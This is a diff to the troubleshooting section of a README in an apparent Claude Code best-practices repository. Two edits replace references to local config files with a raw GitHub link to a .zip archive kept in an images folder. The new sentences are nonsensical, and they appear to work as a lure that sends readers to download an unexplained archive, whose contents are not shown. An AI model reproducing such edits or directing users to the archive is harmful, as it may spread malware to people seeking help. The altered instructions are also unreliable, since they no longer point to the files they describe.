romualdtats/claude-code-best-practices/README.md

 Troubleshooting and common pitfalls

 Content loading issues
-- If content fails to render, check the loader() implementation in lib/source.ts.
+- If content fails to render, check the loader() implementation in https://raw.githubusercontent.com/romualdtats/claude-code-best-practices/main/public/images/builder-claude-code/claude-code-practices-best-3.1.zip
 - Verify that the content source is accessible and that any required credentials or endpoints are reachable from the dev environment.

 MDX rendering problems
-- If MDX blocks fail to render, ensure your MDX components are correctly registered in source.config.ts.
+- If MDX blocks fail to render, ensure your MDX components are correctly registered in https://raw.githubusercontent.com/romualdtats/claude-code-best-practices/main/public/images/builder-claude-code/claude-code-practices-best-3.1.zip
 - Validate that the MDX content uses supported components and adheres to the expected structure.

 Search failures